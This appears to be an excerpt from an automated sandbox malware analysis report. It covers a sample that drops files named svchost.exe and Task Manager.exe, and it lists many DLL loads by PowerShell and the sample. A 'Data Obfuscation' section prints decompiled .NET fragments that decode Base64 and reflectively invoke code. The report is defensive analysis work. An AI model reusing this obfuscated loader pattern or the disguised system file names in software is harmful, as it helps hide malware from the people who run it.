                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                        Source: Window Recorder Window detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: dLRcE11Dkl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: dLRcE11Dkl.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                        Source: dLRcE11Dkl.exe Static file information: File size 1801728 > 1048576
                        Source: dLRcE11Dkl.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1b7400
                        Source: dLRcE11Dkl.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: DC:\Users\Asz\Downloads\SBAGGY\examples\example_win32_directx11\Release\example_win32_directx11.pdb source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp
                        Source: Binary string: C:\Users\Asz\Downloads\SBAGGY\examples\example_win32_directx11\Release\example_win32_directx11.pdb source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp

                        Data Obfuscation

                        Source: svchost.exe.0.dr, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle.SAbUtm3FuD1geH6MZGU8SU1Z985RHBZiQAp2wOzlAMVQgmNBd7I,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle._4UAtMcj92PErTJ7iYByfV9208mv9STJNNYtSqFciQ5iDcVwI0fw,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle._83oOX4R0XjtQnv8lUVK9DqZ98PiUaZGu1c2jT1KiAtLqbEDbyfB,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle.kxzOsS0LVEPkY4t6cTA7vLnZuLxuF1umttA7vJQGCz0D5n9CR8P,IAdtlBkckGw.XNVguCbI3cVHcP1uRwC7TKGqLfj122dlzqP8ieQ9mctf6lSzq6DWmsjACXSXRodoOOLLcCMdDt4ug7Xyo9Nam4()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: svchost.exe.0.dr, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{FpLD7D4ZCq6[2],IAdtlBkckGw.wsxo9ElBPCWUiK5mgsMnznNx8mHBsB9j0XYSdDNof23sXyNu2NaWUuzO8pmMLINZRt1iT3mCa5R0km4EJisc08(Convert.FromBase64String(FpLD7D4ZCq6[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: svchost.exe.0.dr, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { FpLD7D4ZCq6[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle.SAbUtm3FuD1geH6MZGU8SU1Z985RHBZiQAp2wOzlAMVQgmNBd7I,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle._4UAtMcj92PErTJ7iYByfV9208mv9STJNNYtSqFciQ5iDcVwI0fw,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle._83oOX4R0XjtQnv8lUVK9DqZ98PiUaZGu1c2jT1KiAtLqbEDbyfB,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle.kxzOsS0LVEPkY4t6cTA7vLnZuLxuF1umttA7vJQGCz0D5n9CR8P,IAdtlBkckGw.XNVguCbI3cVHcP1uRwC7TKGqLfj122dlzqP8ieQ9mctf6lSzq6DWmsjACXSXRodoOOLLcCMdDt4ug7Xyo9Nam4()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{FpLD7D4ZCq6[2],IAdtlBkckGw.wsxo9ElBPCWUiK5mgsMnznNx8mHBsB9j0XYSdDNof23sXyNu2NaWUuzO8pmMLINZRt1iT3mCa5R0km4EJisc08(Convert.FromBase64String(FpLD7D4ZCq6[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { FpLD7D4ZCq6[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle.SAbUtm3FuD1geH6MZGU8SU1Z985RHBZiQAp2wOzlAMVQgmNBd7I,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle._4UAtMcj92PErTJ7iYByfV9208mv9STJNNYtSqFciQ5iDcVwI0fw,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle._83oOX4R0XjtQnv8lUVK9DqZ98PiUaZGu1c2jT1KiAtLqbEDbyfB,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle.kxzOsS0LVEPkY4t6cTA7vLnZuLxuF1umttA7vJQGCz0D5n9CR8P,IAdtlBkckGw.XNVguCbI3cVHcP1uRwC7TKGqLfj122dlzqP8ieQ9mctf6lSzq6DWmsjACXSXRodoOOLLcCMdDt4ug7Xyo9Nam4()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{FpLD7D4ZCq6[2],IAdtlBkckGw.wsxo9ElBPCWUiK5mgsMnznNx8mHBsB9j0XYSdDNof23sXyNu2NaWUuzO8pmMLINZRt1iT3mCa5R0km4EJisc08(Convert.FromBase64String(FpLD7D4ZCq6[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { FpLD7D4ZCq6[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Task Manager.exe.2.dr, dIQI3NYLguO.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_5ygbuQlYXzpOj5vvOa691gU3LoZoNF2rl1YqJVBxR2QJaQvrtMLpHvJqMAhFqC8Xwn0C.N6nImViohBIsnGqMDfm0TI6YNwhO0YJ6lNg5xP2ds1QCbdBp00Udb0WaX2vGNSRlRZJl,_5ygbuQlYXzpOj5vvOa691gU3LoZoNF2rl1YqJVBxR2QJaQvrtMLpHvJqMAhFqC8Xwn0C.uDnPsG6WkrYkZgozcLEvxEUsDYxfzaSdRH2TfrUHYyiTB8BAOGp4xgOv3opoJGVclxg3,_5ygbuQlYXzpOj5vvOa691gU3LoZoNF2rl1YqJVBxR2QJaQvrtMLpHvJqMAhFqC8Xwn0C.fHt2e9tVGbc4nZGRYkmh8V8FP8V5f0czothtaB2EjG78bRZiaB1coFeF235Wa1QCmGkq,_5ygbuQlYXzpOj5vvOa691gU3LoZoNF2rl1YqJVBxR2QJaQvrtMLpHvJqMAhFqC8Xwn0C.Ljf96Ze50zuw4tX37oXMLdO2Oj1sSEXIkhvWSmsYnxy9baTDJ2XnuUMSNP9TdjltI0UM,DPEF9ZxDQwL.UEhXVQIcqzW()}}, (string[])null, (Type[])null, (bool[])null, true)
